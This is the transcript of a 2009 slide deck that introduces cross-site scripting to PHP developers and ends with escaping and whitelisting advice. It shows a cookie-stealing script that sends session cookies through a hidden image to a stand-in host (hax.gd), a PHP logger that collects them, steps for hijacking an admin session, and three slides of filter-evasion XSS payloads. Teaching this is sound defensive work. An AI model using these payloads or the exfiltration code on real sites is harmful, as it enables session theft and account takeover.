Upgrade to Pro — share decks privately, control downloads, hide ads and more …

XSS: An Introduction and Demonstration (2009)

E34acb847338523dc088f03f0eedd1eb?s=47 Rob Howard
September 02, 2009
Technology
2
160

XSS: An Introduction and Demonstration (2009)

The first in a short series of presentations given at a PHP development shop.

E34acb847338523dc088f03f0eedd1eb?s=128

Rob Howard

September 02, 2009
Tweet

More Decks by Rob Howard

See All by Rob Howard
E34acb847338523dc088f03f0eedd1eb?s=48 damncabbage
0
24
E34acb847338523dc088f03f0eedd1eb?s=48 damncabbage
0
45
E34acb847338523dc088f03f0eedd1eb?s=48 damncabbage
0
75
E34acb847338523dc088f03f0eedd1eb?s=48 damncabbage
1
62
E34acb847338523dc088f03f0eedd1eb?s=48 damncabbage
6
2.2k
E34acb847338523dc088f03f0eedd1eb?s=48 damncabbage
0
180
E34acb847338523dc088f03f0eedd1eb?s=48 damncabbage
1
84
E34acb847338523dc088f03f0eedd1eb?s=48 damncabbage
0
61
E34acb847338523dc088f03f0eedd1eb?s=48 damncabbage
1
110

Other Decks in Technology

See All in Technology
3e43337419f62a7e3eefc1b81145a987?s=48 yutakasugiura
0
1.2k
Ec84be044168226842bf1d38ae2e8e50?s=48 nagahara
6
790
Bac74c17d65c22d0ae63915251f7750f?s=48 simboss
1
170
17d762ae166e66cab39e9b2e3df7d198?s=48 ysakashita
7
3.4k
26afa82334d1037f0ba602272b950c90?s=48 kazuhitotakahashi
0
230
4dca78303031ea5acf25b0183cd900f8?s=48 kanasann1106
0
250
Fd38d7ee40295f6361aa059008288731?s=48 shyaginuma
2
610
1fbd94fe0e6c61f43710f4fbb7e1ecdf?s=48 hashiyaman
0
390
Cdf97a1b1b132c56582773c3ba09a3a6?s=48 rakus_dev
0
310
97a7f7899e0df28c3636b8d44bbe6578?s=48 korodroid
0
120
Ecad9d801d79f6c6e5df93094690685e?s=48 sinsoku
6
1.7k
66310d2dc1c18188f722d71dfb444bad?s=48 tatsumin39
0
390

Featured

See All Featured
Be9caeb9d4ef9944d151af909063ed6e?s=48 samlambert
237
10k
Dad095ea7038f89f760419ce475d5d14?s=48 michaelherold
226
8.7k
D36d2c1821af9249b69ff7f5ed60529b?s=48 tammielis
238
23k
E4f5d494ebdc9e7cce1aecf3ce3e8bc1?s=48 shpigford
371
43k
32de0bd2ba869609d26fd052a4622778?s=48 cromwellryan
104
6.4k
3d4519fd34b76fb265fc0237f3792bd4?s=48 danielanewman
3
640
88bc30284c6a424b63a92aad27d0ba36?s=48 jnunemaker
PRO
42
4.8k
C0b42577cfc2b321be3474618107e933?s=48 samanthasiow
59
6.6k
C157b16234f1e75e8eac3698c1d4414a?s=48 ddemaree
273
32k
0c6fd6a08d0f898159cda7cafcacf07f?s=48 afnizarnur
178
14k
C44e1f7e22c3f23cff7bc130871047ef?s=48 eileencodes
115
26k
44b54d2ffcb7857004071cc6795dde11?s=48 cassininazir
347
20k

Transcript

  1. XSS An Introduction and Attack Demonstration

  2. XSS: An Introduction  “Cross-Site Scripting”  Using client-side code

    to send sensitive information off to far-away places.  eg. Javascript

  3. XSS: An Introduction <td>Bobby Tables</td>

  4. XSS: An Introduction <td><script src=http://hax.gd/x.js> <script>Mallory</td> Oh shit.

  5. XSS: An Introduction  That http://hax.gd/x.js script could be: alert('HA

    HA.'); alert('Survive make your time.');

  6. XSS: An Introduction  That http://hax.gd/x.js script could be: document.write(document.cookie);

  7. XSS: An Introduction  That http://hax.gd/x.js script could be: document.write(

    '<img src="http://hax.gd/x.php?'+ escape(document.cookie)+'" style="display:none;" />'); <td><img src="http://hax.gd/x.php?award_visited=1;...; __csuid=489058e83ee2e832;_PHPSESSID=t57tm1fvvdhonprigkdon71677" style="display:none;" />Mallory</td>

  8. XSS: An Introduction  Let's have a look at http://hax.gd/x.php:

    <?php $fh=fopen('xss.log','a'); fwrite($fh,$_SERVER['HTTP_REFERER']. var_export($_GET,1)); fclose($fh); http://example/cms/objects.php? _obj_name=example_data&_subnav=123 array('award_visited=1;__csuid=blah; _PHPSESSID=t57tm1fvvdhonprigkdon7167 7' => '',)

  9. XSS: An Introduction  So what? http://example/cms/objects.php? _obj_name=example_data&_subnav=123 array('award_visited=1;__csuid=blah; _PHPSESSID=

    t57tm1fvvdhonprigkdon71677 ' => '',)

  10. XSS: An Introduction  So what? http://example/cms/objects.php? _obj_name=example_data&_subnav=123 array('award_visited=1;__csuid=blah; _PHPSESSID=

    t57tm1fvvdhonprigkdon71677 ' => '',)

  11. XSS: An Introduction  Steal the cookie.  Get the

    URL to the admin screen.  Log in at will, exposing the very soft underbelly.  Time for a demo.
  12. None

  13. Filtering and Escaping  Sometimes are conflated, with side-effects being

    things like backslashes or entity tags found in stored data.  This is all very well and good, but what happens if you want to put this into an email message or save out to a text document?  “Strip out all tags!” can result in mangled content:  eg. <3, <( ^o^)>, 1 < x < 5, “if foo <> bar then”

  14. Filtering and Escaping  Validation & Filtering: Checking for and

    getting rid of the nasties.  Checking data is of the correct type, eg. email addresses, postcodes, message text.  Stripping out control characters, fixing multibyte encoding shenanigans with iconv().  Escaping: Packaging data up for transport.  mysql_real_escape_string() for MySQL strings.  htmlentities($x, ENT_QUOTES, 'UTF-8'); for HTML.  urlencode() for query params.

  15. Filtering and Escaping  Why don't we just kill any

    <script> tags we find? <IMG SRC=javascript:alert('a')> <img src=javascript:alert(&quot;a&quot;)> <img “””><script>alert('a')</script>”> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114; &#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114; &#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72 &#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72 &#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav ascript:alert('a');"> <IMG SRC="jav&#x09;as&#x09cript:alert('XSS');"> <IMG SRC="jav&#x0A;ascript:alert('XSS');"> <SCR\0IPT>alert('a')</SCR\0IPT> <SCRIPT/a SRC="http://foo/x.js"></SCRIPT> <img onmouseover!#$%&=alert('a')> <<SCRIPT>alert("a");//<</SCRIPT> <SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT> <SC\0RIPT SRC=http://foo/x.js?<B> <script src=//foo/x.js> <img src=”javascript:alert('a')” <IMG SRC = " j a v a s c r i p t : a l e r t ( ' a ' ) " >

  16. Filtering and Escaping  Why don't we just kill any

    <script> tags we find? <iframe src=http://foo/x.html < <body background=”javascript:alert('a')”> <BODY ONLOAD=alert('a')> <img dynsrc=”javascript:alert('a')”> <img lowsrc=”javascript:alert('a')”> <BGSOUND SRC=javascript:alert('a')> <BR SIZE=”&{alert('a')}”> <LAYER SRC=”http://foo/x.html”></LAYER> <link rel=”stylesheet” href=”javascript:alert('a');”> <XSS STYLE="behavior: url(xss.htc);"> <STYLE>BODY{-moz-binding:url("http://foo/x.xml#xss")}</STYLE> <IMG SRC='vbscript:msgbox(“a”)'> <img src=”livescript:alert('a')”> žscriptualert(EXSSE)ž/scriptu (US-ASCII encoding evasion) <META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert('a');”> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')">

  17. Filtering and Escaping  Why don't we just kill any

    <script> tags we find? <DIV STYLE="background-image: url(javascript:alert('a'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a \0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061 \006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="background-image: url(&#1;javascript:alert('a'))"> <DIV STYLE="width: expression(alert('a'));"> <STYLE>@im\port'\ja\vasc\ript:alert("a")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('a'))"> exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("a"))'> <STYLE TYPE="text/javascript">alert('a');</STYLE> <STYLE>.x{background-image:url("javascript:alert('a')");}</STYLE><A CLASS=X></A> <BASE HREF="javascript:alert('a');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://foo/x.html"></OBJECT> <EMBED SRC="http://foo/xss.swf" AllowScriptAccess="always"></EMBED> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzd....jwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

  18. Filtering and Escaping  Yeah, no.  The transport is

    HTML; package it appropriately.  Using htmlentities($xsslol, ENT_QUOTES, 'UTF-8') will completely neuter most of this stuff.  Use it even on the things you “trust” like $_SERVER['PHP_SELF'], or REQUEST_URI.  It gets hard when you need to put user data into src=”” and style=”” fields; suggest using a whitelist instead, no matter how much of a pain it is to implement. (Or in the case of images and other files, generating the filename for them.)